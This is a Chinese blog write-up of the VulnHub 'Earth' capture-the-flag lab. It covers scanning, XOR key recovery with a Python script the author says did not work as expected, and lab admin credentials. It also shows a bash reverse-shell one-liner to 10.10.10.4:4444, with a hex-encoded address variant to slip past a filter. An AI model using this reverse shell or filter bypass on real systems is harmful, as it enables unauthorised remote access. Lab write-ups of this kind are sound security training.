vulnhub Earth:解题思路

花纵酒

已于 2022-01-30 10:37:08 修改

阅读量3.1k

点赞数

分类专栏： kali 文章标签：系统安全

于 2022-01-28 11:44:01 首次发布

本文链接：https://blog.csdn.net/lm19770429/article/details/122728920

版权

kali 专栏收录该内容

31 篇文章 4 订阅

订阅专栏

靶场下载地址：

The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#download

Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.

前期工作简介：

扫描地址

nmap查询收集靶机信息，dirb http://IP 和https://ip都没啥有用的发现

于是：在/etc/hosts接入地址解析映射到红框中的域名

再用dirb扫描上述域名的web目录，有重大发现

浏览扫描到的URL

写个简单py脚本，选一个Previous Messages数据，然后与 testdata.txt 进行一下 XOR 运算，得到密钥

import binascii
data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1,16) ^ int(f,16)))

据说得到的16进制是这样的：但是运算了好几次，都不是，这是待解决问题

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六进制转文本解码一下：
密码是重复的，然后使用用户名 terra ，密码：earthclimatechangebad4humans 登录 https://earth.local/admin

重点：bash -i >& /dev/tcp/10.10.10.4/4444 0>&1，这是标准的反射命令，但是需要用16进制代替10进制绕过，bash -i >& /dev/tcp/0x0a.0x0a.0x0a.0x04/4444 0>&1

试试弱口令、密码复用，均不对

查找FLAG的命令：

find / -name "*flag*" 2>/dev/null

花纵酒

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
vulnhub Earth:解题思路

靶场下载地址：The Planets: Earth ~ VulnHubThe Planets: Earth, made by SirFlash. Download & walkthrough links are available.https://www.vulnhub.com/entry/the-planets-earth,755/#downloadEarth is an easy box though you will likely find it more challenging t
复制链接

扫一扫